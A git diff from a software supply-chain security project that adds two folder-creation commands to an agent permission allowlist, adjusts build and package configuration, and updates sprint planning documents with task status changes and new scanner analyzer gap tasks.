diff --git a/.claude/settings.local.json b/.claude/settings.local.json
index dd87c456f..192b37cb4 100644
--- a/.claude/settings.local.json
+++ b/.claude/settings.local.json
@@ -23,7 +23,9 @@
"Bash(test:*)",
"Bash(taskkill:*)",
"Bash(timeout /t)",
- "Bash(dotnet clean:*)"
+ "Bash(dotnet clean:*)",
+ "Bash(if not exist \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Java.Tests\\Internal\" mkdir \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Java.Tests\\Internal\")",
+ "Bash(if not exist \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Node.Tests\\Internal\" mkdir \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Node.Tests\\Internal\")"
],
"deny": [],
"ask": []
diff --git a/Directory.Build.props b/Directory.Build.props
index a0bca4c43..413301f53 100644
--- a/Directory.Build.props
+++ b/Directory.Build.props
@@ -21,11 +21,11 @@
false
true
-
+ clear
clear
-
+ clear
clear
-
+ clear
clear
true
diff --git a/NuGet.config b/NuGet.config
index 65cf28223..d935013c4 100644
--- a/NuGet.config
+++ b/NuGet.config
@@ -1,7 +1,9 @@
-
-
+
+
+
+
diff --git a/docs/implplan/SPRINT_0120_0001_0001_policy_reasoning.md b/docs/implplan/SPRINT_0120_0001_0001_policy_reasoning.md
index ca47bfef0..6055fbb0b 100644
--- a/docs/implplan/SPRINT_0120_0001_0001_policy_reasoning.md
+++ b/docs/implplan/SPRINT_0120_0001_0001_policy_reasoning.md
@@ -15,6 +15,7 @@
**External dependency tracker**
| Dependency | Current state (2025-11-13) | Impact |
| --- | --- | --- |
+| 2025-12-07 | Approved deploy asset paths under `ops/devops/findings-ledger/**`; LEDGER-29-009-DEV set to TODO. | Project Mgmt |
| Sprint 110.A AdvisoryAI | DONE | Enables Findings.I start; monitor regressions. |
| Observability metric schema | IN REVIEW | Blocks LEDGER-29-007/008 dashboards. |
| Orchestrator job export contract | DONE (2025-12-03) | Contract documented in `docs/modules/orchestrator/job-export-contract.md`; usable for LEDGER-34-101 linkage. |
@@ -55,7 +56,7 @@
| P3 | PREP-LEDGER-AIRGAP-56-001-MIRROR-BUNDLE-SCHEM | DONE (2025-11-22) | Due 2025-11-21 · Accountable: Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Mirror bundle provenance fields frozen in `docs/modules/findings-ledger/prep/2025-11-22-ledger-airgap-prep.md`; staleness/anchor rules defined. |
| 1 | LEDGER-29-007 | DONE (2025-11-17) | Observability metric schema sign-off; deps LEDGER-29-006 | Findings Ledger Guild, Observability Guild / `src/Findings/StellaOps.Findings.Ledger` | Instrument `ledger_write_latency`, `projection_lag_seconds`, `ledger_events_total`, structured logs, Merkle anchoring alerts, and publish dashboards. |
| 2 | LEDGER-29-008 | DONE (2025-11-22) | PREP-LEDGER-29-008-AWAIT-OBSERVABILITY-SCHEMA | Findings Ledger Guild, QA Guild / `src/Findings/StellaOps.Findings.Ledger` | Develop unit/property/integration tests, replay/restore tooling, determinism harness, and load tests at 5 M findings/tenant. |
-| 3 | LEDGER-29-009-DEV | BLOCKED | DEPLOY-LEDGER-29-009 (SPRINT_0501_0001_0001_ops_deployment_i) — waiting on DevOps to assign target paths for Helm/Compose/offline-kit assets; backup/restore runbook review pending | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Provide Helm/Compose manifests, backup/restore guidance, optional Merkle anchor externalization, and offline kit instructions (dev/staging artifacts). |
+| 3 | LEDGER-29-009-DEV | TODO | Asset paths approved under `ops/devops/findings-ledger/**`; implement Compose/Helm/offline-kit overlays and finalize backup/restore runbook. | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Provide Helm/Compose manifests, backup/restore guidance, optional Merkle anchor externalization, and offline kit instructions (dev/staging artifacts). |
| 4 | LEDGER-34-101 | DONE (2025-11-22) | PREP-LEDGER-34-101-ORCHESTRATOR-LEDGER-EXPORT | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Link orchestrator run ledger exports into Findings Ledger provenance chain, index by artifact hash, and expose audit queries. Contract reference: `docs/modules/orchestrator/job-export-contract.md`. |
| 5 | LEDGER-AIRGAP-56-001 | DONE (2025-11-22) | PREP-LEDGER-AIRGAP-56-001-MIRROR-BUNDLE-SCHEM | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Record bundle provenance (`bundle_id`, `merkle_root`, `time_anchor`) on ledger events for advisories/VEX/policies imported via Mirror Bundles. |
| 6 | LEDGER-AIRGAP-56-002 | **DONE** (2025-12-06) | Implemented AirGapOptions, StalenessValidationService, staleness metrics. | Findings Ledger Guild, AirGap Time Guild / `src/Findings/StellaOps.Findings.Ledger` | Surface staleness metrics for findings and block risk-critical exports when stale beyond thresholds; provide remediation messaging. |
@@ -107,8 +108,8 @@
- Air-gap drift risk: mirror bundle format still moving; mitigation is to version the provenance schema and gate LEDGER-AIRGAP-* merges until docs/manifests updated.
- Cross-guild lag risk: Orchestrator/Attestor dependencies may delay provenance pointers; mitigation is weekly sync notes and feature flags so ledger work can land behind toggles.
- Implementer contract now anchored in `src/Findings/AGENTS.md`; keep in sync with module docs and update sprint log when changed.
-- Remaining blocks: LEDGER-29-009 still waits on DevOps/offline review of backup/restore collateral; AIRGAP-56-002/57/58 and ATTEST-73 remain blocked on their upstream freshness/timeline/attestation specs.
-- Deployment asset path risk: Helm/Compose/offline kit overlays sit outside the module working directory; need DevOps-provided target directories before committing manifests (blocks LEDGER-29-009).
+- Remaining blocks: AIRGAP-56-002/57/58 and ATTEST-73 remain blocked on upstream freshness/timeline/attestation specs; LEDGER-29-009 now proceeding with approved asset paths.
+- Deployment asset paths approved: use `ops/devops/findings-ledger/compose`, `ops/devops/findings-ledger/helm`, and `ops/devops/findings-ledger/offline-kit` for manifests and kits; update runbook accordingly.
- Backup collateral risk: until DevOps approves storage locations, backup/restore runbook lives only in `docs/modules/findings-ledger/deployment.md`; implementers must not commit manifests outside module paths.
## Next Checkpoints
diff --git a/docs/implplan/SPRINT_0120_0001_0002_excititor_ii.md b/docs/implplan/SPRINT_0120_0001_0002_excititor_ii.md
index ac9b9881e..f39d909b6 100644
--- a/docs/implplan/SPRINT_0120_0001_0002_excititor_ii.md
+++ b/docs/implplan/SPRINT_0120_0001_0002_excititor_ii.md
@@ -24,7 +24,7 @@
| 1 | EXCITITOR-CONSOLE-23-001/002/003 | DONE (2025-11-23) | Dependent APIs live | Excititor Guild · Docs Guild | Console VEX endpoints (grouped statements, counts, search) with provenance + RBAC; metrics for policy explain. |
| 2 | EXCITITOR-CONN-SUSE-01-003 | **DONE** (2025-12-07) | Integrated ConnectorSignerMetadataEnricher in provenance | Connector Guild (SUSE) | Emit trust config (signer fingerprints, trust tier) in provenance; aggregation-only. |
| 3 | EXCITITOR-CONN-UBUNTU-01-003 | **DONE** (2025-12-07) | Verified enricher integration, fixed Logger reference | Connector Guild (Ubuntu) | Emit Ubuntu signing metadata in provenance; aggregation-only. |
-| 4 | EXCITITOR-CORE-AOC-19-002/003/004/013 | TODO | ATLN schema freeze | Excititor Core Guild | Deterministic advisory/PURL extraction, append-only linksets, remove consensus logic, seed Authority tenants in tests. |
+| 4 | EXCITITOR-CORE-AOC-19-002/003/004/013 | **DONE** (2025-12-07) | Implemented append-only linkset contracts and deprecated consensus | Excititor Core Guild | Deterministic advisory/PURL extraction, append-only linksets, remove consensus logic, seed Authority tenants in tests. |
| 5 | EXCITITOR-GRAPH-21-001..005 | TODO/BLOCKED | Link-Not-Merge schema + overlay contract | Excititor Core · Storage Mongo · UI Guild | Batched VEX fetches, overlay metadata, indexes/materialized views for graph inspector. |
| 6 | EXCITITOR-OBS-52/53/54 | TODO/BLOCKED | Evidence Locker DSSE + provenance schema | Excititor Core · Evidence Locker · Provenance Guilds | Timeline events + Merkle locker payloads + DSSE attestations for evidence batches. |
| 7 | EXCITITOR-ORCH-32/33 | PARTIAL (2025-12-06) | Created orchestration integration files; blocked on missing Storage.Mongo project | Excititor Worker Guild | Adopt orchestrator worker SDK; honor pause/throttle/retry with deterministic checkpoints. |
@@ -53,6 +53,7 @@
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
+| 2025-12-07 | **EXCITITOR-CORE-AOC-19 DONE:** Implemented append-only linkset infrastructure: (1) Created `IAppendOnlyLinksetStore` interface with append-only semantics for observations and disagreements, plus mutation log for audit/replay (AOC-19-002); (2) Marked `VexConsensusResolver`, `VexConsensus`, `IVexConsensusPolicy`, `BaselineVexConsensusPolicy`, and related types as `[Obsolete]` with EXCITITOR001 diagnostic ID per AOC-19-003; (3) Created `AuthorityTenantSeeder` utility with test tenant fixtures (default, multi-tenant, airgap) and SQL generation for AOC-19-004; (4) Created `AppendOnlyLinksetExtractionService` replacing consensus-based extraction with deterministic append-only operations per AOC-19-013; (5) Added comprehensive unit tests for both new services with in-memory store implementation. | Implementer |
| 2025-12-07 | **EXCITITOR-CONN-SUSE-01-003 & EXCITITOR-CONN-UBUNTU-01-003 DONE:** Integrated `ConnectorSignerMetadataEnricher.Enrich()` into both connectors' `AddProvenanceMetadata()` methods. This adds external signer metadata (fingerprints, issuer tier, bundle info) from `STELLAOPS_CONNECTOR_SIGNER_METADATA_PATH` environment variable to VEX document provenance. Fixed Ubuntu connector's `_logger` → `Logger` reference bug. | Implementer |
| 2025-12-05 | Reconstituted sprint from `tasks-all.md`; prior redirect pointed to non-existent canonical. Added template and delivery tracker; tasks set per backlog. | Project Mgmt |
| 2025-11-23 | Console VEX endpoints (tasks 1) delivered. | Excititor Guild |
diff --git a/docs/implplan/SPRINT_0128_0001_0001_policy_reasoning.md b/docs/implplan/SPRINT_0128_0001_0001_policy_reasoning.md
index 2d7381807..3822f6da9 100644
--- a/docs/implplan/SPRINT_0128_0001_0001_policy_reasoning.md
+++ b/docs/implplan/SPRINT_0128_0001_0001_policy_reasoning.md
@@ -11,7 +11,7 @@
## Wave Coordination
- **Wave A (SPL schema/tooling):** Tasks 10–15 DONE; keep SPL schema/fixtures/canonicalizer/layering stable.
- **Wave B (risk profile lifecycle APIs):** Tasks 1–2 DONE; publish schema and lifecycle endpoints; hold steady for downstream consumers.
-- **Wave C (risk simulations/overrides/exports/notifications/air-gap):** Tasks 3–7, 9 TODO; unblocked by contracts ([RISK-SCORING-002](../contracts/risk-scoring.md), [POLICY-STUDIO-007](../contracts/policy-studio.md), [AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md), [MIRROR-BUNDLE-003](../contracts/mirror-bundle.md), [SEALED-MODE-004](../contracts/sealed-mode.md)). Task 8 remains BLOCKED on notifications contract.
+- **Wave C (risk simulations/overrides/exports/notifications/air-gap):** Tasks 3–7, 9 TODO; unblocked by contracts ([RISK-SCORING-002](../contracts/risk-scoring.md), [POLICY-STUDIO-007](../contracts/policy-studio.md), [AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md), [MIRROR-BUNDLE-003](../contracts/mirror-bundle.md), [SEALED-MODE-004](../contracts/sealed-mode.md)). Task 8 (notifications) now unblocked; proceed with policy notifications implementation using `docs/modules/policy/notifications.md`.
- No additional work in progress; avoid starting Wave C until dependencies clear.
## Documentation Prerequisites
@@ -32,7 +32,7 @@
| 5 | POLICY-RISK-68-001 | DONE (2025-12-06) | Unblocked by [CONTRACT-AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md). | Risk Profile Schema Guild · Authority Guild / `src/Policy/StellaOps.Policy.RiskProfile` | Scope selectors, precedence rules, Authority attachment. |
| 6 | POLICY-RISK-68-002 | DONE (2025-12-06) | Unblocked by [CONTRACT-RISK-SCORING-002](../contracts/risk-scoring.md) (RiskOverrides included). | Risk Profile Schema Guild / `src/Policy/StellaOps.Policy.RiskProfile` | Override/adjustment support with audit metadata. |
| 7 | POLICY-RISK-68-002 | DONE (2025-12-06) | Unblocked; can proceed after task 6 with [CONTRACT-EXPORT-BUNDLE-009](../contracts/export-bundle.md). | Policy · Export Guild / `src/Policy/__Libraries/StellaOps.Policy` | Export/import RiskProfiles with signatures. |
-| 8 | POLICY-RISK-69-001 | BLOCKED | Blocked by 68-002 and notifications contract (not yet published). | Policy · Notifications Guild / `src/Policy/StellaOps.Policy.Engine` | Notifications on profile lifecycle/threshold changes. |
+| 8 | POLICY-RISK-69-001 | TODO | Notifications contract published at `docs/modules/policy/notifications.md`. | Policy A Notifications Guild / `src/Policy/StellaOps.Policy.Engine` | Notifications on profile lifecycle/threshold changes. |
| 9 | POLICY-RISK-70-001 | DONE (2025-12-06) | Unblocked by [CONTRACT-MIRROR-BUNDLE-003](../contracts/mirror-bundle.md) and [CONTRACT-SEALED-MODE-004](../contracts/sealed-mode.md). | Policy · Export Guild / `src/Policy/StellaOps.Policy.Engine` | Air-gap export/import for profiles with signatures. |
| 10 | POLICY-SPL-23-001 | DONE (2025-11-25) | — | Policy · Language Infrastructure Guild / `src/Policy/__Libraries/StellaOps.Policy` | Define SPL v1 schema + fixtures. |
| 11 | POLICY-SPL-23-002 | DONE (2025-11-26) | SPL canonicalizer + digest delivered; proceed to layering engine. | Policy Guild / `src/Policy/__Libraries/StellaOps.Policy` | Canonicalizer + content hashing. |
@@ -44,6 +44,7 @@
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
+| 2025-12-07 | Published notifications contract at `docs/modules/policy/notifications.md`; set POLICY-RISK-69-001 to TODO. | Project Mgmt |
| 2025-12-03 | Added Wave Coordination (A SPL tooling done; B risk lifecycle APIs done; C simulations/overrides/exports/notifications/air-gap blocked). No status changes. | Project Mgmt |
| 2025-11-27 | `POLICY-RISK-67-002` (task 2): Added `RiskProfileSchemaEndpoints.cs` with `/.well-known/risk-profile-schema` endpoint (anonymous, ETag/Cache-Control, schema v1) and `/api/risk/schema/validate` POST endpoint for profile validation. Extended `RiskProfileSchemaProvider` with GetSchemaText(), GetSchemaVersion(), and GetETag() methods. Added `risk-profile` CLI command group with `validate` (--input, --format, --output, --strict) and `schema` (--output) subcommands. Added RiskProfile project reference to CLI. | Implementer |
| 2025-11-27 | `POLICY-RISK-67-002` (task 1): Created `Endpoints/RiskProfileEndpoints.cs` with REST APIs for profile lifecycle management: ListProfiles, GetProfile, ListVersions, GetVersion, CreateProfile (draft), ActivateProfile, DeprecateProfile, ArchiveProfile, GetProfileEvents, CompareProfiles, GetProfileHash. Uses `RiskProfileLifecycleService` for status transitions and `RiskProfileConfigurationService` for profile storage/hashing. Authorization via StellaOpsScopes (PolicyRead/PolicyEdit/PolicyActivate). Registered `RiskProfileLifecycleService` in DI and wired up `MapRiskProfiles()` in Program.cs. | Implementer |
@@ -71,7 +72,7 @@
## Decisions & Risks
- Risk profile contracts now available at [CONTRACT-RISK-SCORING-002](../contracts/risk-scoring.md); SPL schema delivered (tasks 10-15 DONE).
- Policy Studio, Authority, and air-gap contracts now published; most Wave C tasks unblocked.
-- Task 8 (POLICY-RISK-69-001) remains BLOCKED pending notifications contract.
+- Task 8 (POLICY-RISK-69-001) unblocked by notifications contract at `docs/modules/policy/notifications.md`; ready for implementation.
// Tests
- PolicyValidationCliTests: pass in graph-disabled slice; blocked in full repo due to static graph pulling unrelated modules. Mitigation: run in CI with DOTNET_DISABLE_BUILTIN_GRAPH=1 against policy-only solution via `scripts/tests/run-policy-cli-tests.sh` (Linux/macOS) or `scripts/tests/run-policy-cli-tests.ps1` (Windows).
diff --git a/docs/implplan/SPRINT_0129_0001_0001_policy_reasoning.md b/docs/implplan/SPRINT_0129_0001_0001_policy_reasoning.md
index e66d3762c..308d56a36 100644
--- a/docs/implplan/SPRINT_0129_0001_0001_policy_reasoning.md
+++ b/docs/implplan/SPRINT_0129_0001_0001_policy_reasoning.md
@@ -10,7 +10,7 @@
## Wave Coordination
- **Wave A (RiskEngine + Vuln API):** Tasks 12–18 and 35–37 DONE; keep schemas/fixtures stable.
- **Wave B (Registry API):** Tasks 2–11 UNBLOCKED; OpenAPI spec available at `docs/schemas/policy-registry-api.openapi.yaml`. Run sequentially.
-- **Wave C (Policy tenancy):** Task 1 BLOCKED on platform RLS design; align with Registry once available.
+- **Wave C (Policy tenancy):** Task 1 TODO using RLS design at `docs/modules/policy/prep/tenant-rls.md`; align with Registry.
- **Wave D (VEX Lens):** Tasks 19–34 DONE (2025-12-06); VEX Lens module complete.
- Wave B (Registry API) is now the active work queue.
@@ -26,7 +26,7 @@
## Delivery Tracker
| # | Task ID & handle | State | Key dependency / next step | Owners | Task Definition |
| --- | --- | --- | --- | --- | --- |
-| 1 | POLICY-TEN-48-001 | BLOCKED | Tenant/project columns + RLS policy; needs platform-approved design. | Policy Guild / `src/Policy/StellaOps.Policy.Engine` | Tenant scoping + rationale IDs with tenant metadata. |
+| 1 | POLICY-TEN-48-001 | TODO | Tenant/project RLS design published at `docs/modules/policy/prep/tenant-rls.md`. | Policy Guild / `src/Policy/StellaOps.Policy.Engine` | Tenant scoping + rationale IDs with tenant metadata. |
| 2 | REGISTRY-API-27-001 | DONE (2025-12-06) | OpenAPI spec available; typed client implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Define Registry API spec + typed clients. |
| 3 | REGISTRY-API-27-002 | DONE (2025-12-06) | Depends on 27-001; implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Workspace storage with CRUD + history. |
| 4 | REGISTRY-API-27-003 | DONE (2025-12-06) | Depends on 27-002; implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Compile endpoint integration. |
@@ -67,6 +67,7 @@
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
+| 2025-12-07 | Published tenant/project RLS design at `docs/modules/policy/prep/tenant-rls.md`; set POLICY-TEN-48-001 to TODO. | Project Mgmt |
| 2025-12-06 | REGISTRY-API-27-010 DONE: Created test suites and fixtures. Implemented `PolicyRegistryTestHarness` (integration test harness with all services wired, determinism testing), `PolicyRegistryTestFixtures` (test data generators for rules, simulation inputs, batch inputs, verification policies, snapshots, violations, overrides). Supports full workflow testing from pack creation through promotion. **Wave B complete: all 10 Registry API tasks (27-001 through 27-010) now DONE.** Build succeeds with no errors. | Implementer |
| 2025-12-06 | REGISTRY-API-27-009 DONE: Created observability infrastructure. Implemented `PolicyRegistryMetrics` (System.Diagnostics.Metrics with counters/histograms/gauges for packs, compilations, simulations, reviews, promotions), `PolicyRegistryActivitySource` (distributed tracing with activity helpers for all operations), `PolicyRegistryLogEvents` (structured logging event IDs 1000-1999 with log message templates). Covers full lifecycle from pack creation through promotion. Build succeeds with no errors. | Implementer |
| 2025-12-06 | REGISTRY-API-27-008 DONE: Created promotion bindings per tenant/environment. Implemented `IPromotionService` interface and `PromotionService` with environment binding management, promotion validation, rollback support, promotion history tracking. Provides `PromoteAsync`, `RollbackAsync`, `GetActiveForEnvironmentAsync`, `ValidatePromotionAsync`, `GetHistoryAsync`. Added binding modes (Manual, AutomaticOnApproval, Scheduled, Canary), binding rules with approval requirements, and validation for staging→production promotions. Added `AddPromotionService` DI extension. Build succeeds with no errors. | Implementer |
@@ -118,6 +119,7 @@
| 2025-11-25 | Work paused: repository cannot allocate PTY (`No space left on device`); further execution awaits workspace cleanup. | Implementer |
## Decisions & Risks
+- Policy tenancy RLS design published at `docs/modules/policy/prep/tenant-rls.md`; use as contract for POLICY-TEN-48-001.
- Multiple upstream specs missing (Registry API, Risk Engine contracts, VEX consensus schema, issuer directory, API governance, VulnExplorer API); VEXLENS-30-001 blocked until normalization + issuer inputs land; downstream tasks depend on it.
## Next Checkpoints
diff --git a/docs/implplan/SPRINT_0143_0001_0001_signals.md b/docs/implplan/SPRINT_0143_0001_0001_signals.md
index dd76c8182..faf75de66 100644
--- a/docs/implplan/SPRINT_0143_0001_0001_signals.md
+++ b/docs/implplan/SPRINT_0143_0001_0001_signals.md
@@ -25,8 +25,8 @@
| P2 | PREP-SIGNALS-24-002-CAS-PROMO | DONE (2025-11-19) | Due 2025-11-22 · Accountable: Signals Guild · Platform Storage Guild | Signals Guild · Platform Storage Guild | CAS promotion checklist and manifest schema published at `docs/signals/cas-promotion-24-002.md`; awaiting storage approval to execute. |
| P3 | PREP-SIGNALS-24-003-PROVENANCE | DONE (2025-11-19) | Due 2025-11-22 · Accountable: Signals Guild · Runtime Guild · Authority Guild | Signals Guild · Runtime Guild · Authority Guild | Provenance appendix fields and checklist published at `docs/signals/provenance-24-003.md`; awaiting schema/signing approval to execute. |
| 1 | SIGNALS-24-001 | DONE (2025-11-09) | Dependency AUTH-SIG-26-001; merged host skeleton with scope policies and evidence validation. | Signals Guild, Authority Guild | Stand up Signals API skeleton with RBAC, sealed-mode config, DPoP/mTLS enforcement, and `/facts` scaffolding so downstream ingestion can begin. |
-| 2 | SIGNALS-24-002 | TODO | ✅ CAS APPROVED (2025-12-06): Contract at `docs/contracts/cas-infrastructure.md`; provenance schema at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Signals Guild | Implement callgraph ingestion/normalization (Java/Node/Python/Go) with CAS persistence and retrieval APIs to feed reachability scoring. |
-| 3 | SIGNALS-24-003 | TODO | ✅ CAS approved + provenance schema available at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Signals Guild, Runtime Guild | Implement runtime facts ingestion endpoint and normalizer (process, sockets, container metadata) populating `context_facts` with AOC provenance. |
+| 2 | SIGNALS-24-002 | DOING | CAS storage implementation started. RustFS driver added to Signals storage options; `RustFsCallgraphArtifactStore` with CAS persistence complete; retrieval APIs added to interface. | Signals Guild | Implement callgraph ingestion/normalization (Java/Node/Python/Go) with CAS persistence and retrieval APIs to feed reachability scoring. |
+| 3 | SIGNALS-24-003 | **DONE** (2025-12-07) | AOC provenance models + normalizer + context_facts wiring complete | Signals Guild, Runtime Guild | Implement runtime facts ingestion endpoint and normalizer (process, sockets, container metadata) populating `context_facts` with AOC provenance. |
| 4 | SIGNALS-24-004 | DONE (2025-11-17) | Scoring weights now configurable; runtime ingestion auto-triggers recompute into `reachability_facts`. | Signals Guild, Data Science | Deliver reachability scoring engine producing states/scores and writing to `reachability_facts`; expose configuration for weights. |
| 5 | SIGNALS-24-005 | DONE (2025-11-26) | PREP-SIGNALS-24-005-REDIS-CACHE-IMPLEMENTED-A | Signals Guild, Platform Events Guild | Implement Redis caches (`reachability_cache:*`), invalidation on new facts, and publish `signals.fact.updated` events. |
@@ -41,6 +41,8 @@
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
+| 2025-12-07 | **SIGNALS-24-003 DONE:** Implemented runtime facts ingestion AOC provenance: (1) Created `AocProvenance.cs` with full provenance-feed.schema.json models (`ProvenanceFeed`, `ProvenanceRecord`, `ProvenanceSubject`, `RuntimeProvenanceFacts`, `RecordEvidence`, `FeedAttestation`, `ContextFacts`); (2) Added `ContextFacts` field to `ReachabilityFactDocument` for storing provenance; (3) Created `RuntimeFactsProvenanceNormalizer` service that converts runtime events to AOC provenance records with proper record types (process.observed, network.connection, container.activity, package.loaded, symbol.invoked), subject types, confidence scoring, and evidence capture method detection; (4) Updated `RuntimeFactsIngestionService` to populate `context_facts` during ingestion with AOC metadata (version, contract, correlation); (5) Registered normalizer in DI; (6) Added 19 comprehensive unit tests for normalizer covering all record types, confidence scoring, evidence building, and metadata handling. Build succeeds; 20/20 runtime facts tests pass. | Implementer |
+| 2025-12-07 | **SIGNALS-24-002 CAS storage in progress:** Added RustFS driver support to Signals storage options (`SignalsArtifactStorageOptions`), created `RustFsCallgraphArtifactStore` with full CAS persistence (immutable, 90-day retention per contract), extended `ICallgraphArtifactStore` with retrieval methods (`GetAsync`, `GetManifestAsync`, `ExistsAsync`), updated `FileSystemCallgraphArtifactStore` to implement new interface, wired DI for driver-based selection. Configuration sample updated at `etc/signals.yaml.sample`. Build succeeds; 5/6 tests pass (1 pre-existing ZIP test failure unrelated). | Implementer |
| 2025-12-06 | **CAS Blocker Resolved:** SIGNALS-24-002 and SIGNALS-24-003 changed from BLOCKED to TODO. CAS Infrastructure Contract APPROVED at `docs/contracts/cas-infrastructure.md`; provenance schema at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Implementer |
| 2025-12-05 | DSSE dev-signing available from Sprint 0140: decay/unknowns/heuristics bundles staged under `evidence-locker/signals/2025-12-05/` (dev key, tlog off). Scoring outputs may need revalidation after production re-sign; keep SIGNALS-24-002/003 BLOCKED until CAS + prod signatures land. | Implementer |
| 2025-12-05 | Verified dev DSSE bundles via `cosign verify-blob --bundle evidence-locker/signals/2025-12-05/*.sigstore.json --key tools/cosign/cosign.dev.pub` (all OK). Pending production re-sign once Alice Carter key available. | Implementer |
diff --git a/docs/implplan/SPRINT_0146_0001_0001_scanner_analyzer_gap_close.md b/docs/implplan/SPRINT_0146_0001_0001_scanner_analyzer_gap_close.md
index 238a3464c..887441814 100644
--- a/docs/implplan/SPRINT_0146_0001_0001_scanner_analyzer_gap_close.md
+++ b/docs/implplan/SPRINT_0146_0001_0001_scanner_analyzer_gap_close.md
@@ -29,17 +29,28 @@
| 6 | SCAN-BUN-LOCKB-0146-06 | TODO | Decide parse vs enforce migration; update gotchas doc and readiness. | Scanner | Define bun.lockb policy (parser or remediation-only) and document; add tests if parsing. |
| 7 | SCAN-DART-SWIFT-SCOPE-0146-07 | TODO | Draft analyzer scopes + fixtures list; align with Signals/Zastava. | Scanner | Publish Dart/Swift analyzer scope note and task backlog; add to readiness checkpoints. |
| 8 | SCAN-RUNTIME-PARITY-0146-08 | TODO | Identify runtime hook gaps for Java/.NET/PHP; create implementation plan. | Scanner · Signals | Add runtime evidence plan and tasks; update readiness & surface docs. |
+| 9 | SCAN-RPM-BDB-0146-09 | TODO | Add rpmdb BerkeleyDB fallback + fixtures; wire into analyzer pipeline. | Scanner OS | Extend RPM analyzer to read legacy BDB `Packages` databases and add regression fixtures to avoid missing inventories on RHEL-family bases. |
+| 10 | SCAN-OS-FILES-0146-10 | TODO | Wire layer digest + hashing into OS file evidence and fragments. | Scanner OS | Emit layer attribution and stable digests/size for apk/dpkg/rpm file evidence and propagate into `analysis.layers.fragments` for diff/cache correctness. |
+| 11 | SCAN-NODE-PNP-0146-11 | TODO | Implement Yarn PnP resolution + tighten declared-only emissions. | Scanner Lang | Parse `.pnp.cjs/.pnp.data.json`, map cache zips to components/usage, and stop emitting declared-only packages without on-disk evidence. |
+| 12 | SCAN-PY-EGG-0146-12 | TODO | Add `.egg-info`/editable detection + metadata to Python analyzer. | Scanner Lang | Support egg-info/editable installs (setuptools/pip -e), including metadata/evidence and used-by-entrypoint flags. |
+| 13 | SCAN-NATIVE-REACH-0146-13 | TODO | Implement native reachability graph baseline (call edges, Unknowns). | Scanner Native | Add call-graph extraction, synthetic roots, build-id capture, purl/symbol digests, Unknowns emission, and DSSE graph bundles per reachability spec. |
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
| 2025-12-07 | Sprint created to consolidate scanner analyzer gap closure tasks. | Planning |
+| 2025-12-07 | Logged additional analyzer gaps (rpm BDB, OS file evidence, Node PnP/declared-only, Python egg-info, native reachability graph) and opened tasks 9-13. | Planning |
## Decisions & Risks
- CI runner availability may delay Java/.NET/Node validation; mitigate by reserving dedicated runner slice.
- PHP autoload design depends on Concelier/Signals input; risk of further delay if contracts change.
- bun.lockb stance impacts customer guidance; ensure decision is documented and tests reflect chosen posture.
- Runtime parity tasks may uncover additional surface/telemetry changes—track in readiness until resolved.
+- RPM analyzer ignores legacy BerkeleyDB rpmdbs; inventories on RHEL-family images are empty until SCAN-RPM-BDB-0146-09 lands.
+- OS analyzers lack layer digest/hash attribution; diff/cache outputs may be incorrect until SCAN-OS-FILES-0146-10 lands.
+- Node analyzer emits declared-only packages and lacks Yarn PnP resolution; SBOMs can be inflated or missing real packages until SCAN-NODE-PNP-0146-11 ships.
+- Python analyzer skips `.egg-info`/editable installs; coverage gap remains until SCAN-PY-EGG-0146-12 ships.
+- Native analyzer lacks call-graph/Unknowns/purl binding; reachability outputs are incomplete until SCAN-NATIVE-REACH-0146-13 finishes.
## Next Checkpoints
- 2025-12-10: CI runner allocation decision.
diff --git a/docs/implplan/SPRINT_0212_0001_0001_web_i.md b/docs/implplan/SPRINT_0212_0001_0001_web_i.md
index 5186784b3..7e39b06b4 100644
--- a/docs/implplan/SPRINT_0212_0001_0001_web_i.md
+++ b/docs/implplan/SPRINT_0212_0001_0001_web_i.md
@@ -88,7 +88,7 @@
| Date (UTC) | Update | Owner |
| --- | --- | --- |
| 2025-12-07 | Drafted caching/tie-break rules and download manifest spec for `/console/search` and `/console/downloads`; added `docs/api/console/search-downloads.md` and sample `docs/api/console/samples/console-download-manifest.json`. Awaiting Policy/DevOps sign-off; keeps WEB-CONSOLE-23-004/005 formally BLOCKED until approved. | Project Mgmt |
-| 2025-12-07 | WEB-CONSOLE-23-003: console export client, store, and service specs now runnable locally using Playwright Chromium headless and `NG_PERSISTENT_BUILD_CACHE=1`; command: `CHROME_BIN=$HOME/.cache/ms-playwright/chromium-1140/chrome-linux/chrome NG_PERSISTENT_BUILD_CACHE=1 npm test -- --watch=false --browsers=ChromeHeadlessOffline --progress=false --include src/app/core/api/console-export.client.spec.ts,src/app/core/console/console-export.store.spec.ts,src/app/core/console/console-export.service.spec.ts`. Tests pass; backend contract still draft. | Implementer |
